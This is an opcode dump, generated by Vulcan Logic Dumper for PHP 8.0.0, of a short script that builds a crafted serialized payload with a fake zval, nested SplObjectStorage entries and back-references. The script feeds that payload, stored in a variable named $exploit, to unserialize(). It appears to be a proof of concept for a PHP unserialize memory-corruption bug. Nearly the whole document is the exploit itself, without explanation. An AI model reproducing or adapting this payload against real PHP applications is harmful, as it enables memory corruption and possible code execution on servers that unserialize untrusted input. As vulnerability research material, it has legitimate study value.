Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/KjQo3 function name: (null) number of ops: 32 compiled vars: !0 = $fakezval, !1 = $inner, !2 = $exploit, !3 = $data line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 9 0 E > INIT_FCALL_BY_NAME 'ptr2str' 1 SEND_VAL_EX 1122334455 2 DO_FCALL 0 $4 3 ASSIGN !0, $4 10 4 INIT_FCALL_BY_NAME 'ptr2str' 5 SEND_VAL_EX 0 6 DO_FCALL 0 $6 7 ASSIGN_OP 8 !0, $6 11 8 ASSIGN_OP 8 !0, '%00%00%00%00' 12 9 ASSIGN_OP 8 !0, '%01' 13 10 ASSIGN_OP 8 !0, '%00' 14 11 ASSIGN_OP 8 !0, '%00%00' 16 12 ASSIGN !1, 'x%3Ai%3A1%3BO%3A8%3A%22stdClass%22%3A0%3A%7B%7D%2Ci%3A1%3B%3Bm%3Aa%3A0%3A%7B%7D' 17 13 STRLEN ~13 !1 14 CONCAT ~14 'a%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3BC%3A16%3A%22SplObjectStorage%22%3A', ~13 15 CONCAT ~15 ~14, '%3A%7B' 16 CONCAT ~16 ~15, !1 17 CONCAT ~17 ~16, '%7Di%3A2%3BO%3A3%3A%22obj%22%3A1%3A%7Bs%3A4%3A%22ryat%22%3BR%3A3%3B%7Di%3A3%3BR%3A6%3Bi%3A4%3Bs%3A' 18 STRLEN ~18 !0 19 CONCAT ~19 ~17, ~18 20 CONCAT ~20 ~19, '%3A%22' 21 CONCAT ~21 ~20, !0 22 CONCAT ~22 ~21, '%22%3B%7D' 23 ASSIGN !2, ~22 19 24 INIT_FCALL 'unserialize' 25 SEND_VAR !2 26 DO_ICALL $24 27 ASSIGN !3, $24 21 28 INIT_FCALL 'var_dump' 29 SEND_VAR !3 30 DO_ICALL 31 31 > RETURN 1 Function ptr2str: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 42) Position 1 = 11 Branch analysis from position: 11 2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4 Branch analysis from position: 13 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 4 2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4 Branch analysis from position: 13 Branch analysis from position: 4 filename: /in/KjQo3 function name: ptr2str number of ops: 15 compiled vars: !0 = $ptr, !1 = $out, !2 = $i line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 23 0 E > RECV !0 25 1 ASSIGN !1, '' 26 2 ASSIGN !2, 0 3 > JMP ->11 27 4 > INIT_FCALL 'chr' 5 BW_AND ~5 !0, 255 6 SEND_VAL ~5 7 DO_ICALL $6 8 ASSIGN_OP 8 !1, $6 28 9 ASSIGN_OP 7 !0, 8 26 10 PRE_INC !2 11 > IS_SMALLER !2, 8 12 > JMPNZ ~10, ->4 30 13 > > RETURN !1 31 14* > RETURN null End of function ptr2str Class obj: Function __wakeup: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/KjQo3 function name: __wakeup number of ops: 3 compiled vars: none line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 5 0 E > ASSIGN_OBJ 'ryat' 1 OP_DATA 1 6 2 > RETURN null End of function __wakeup End of class obj.
Generated using Vulcan Logic Dumper, using php 8.0.0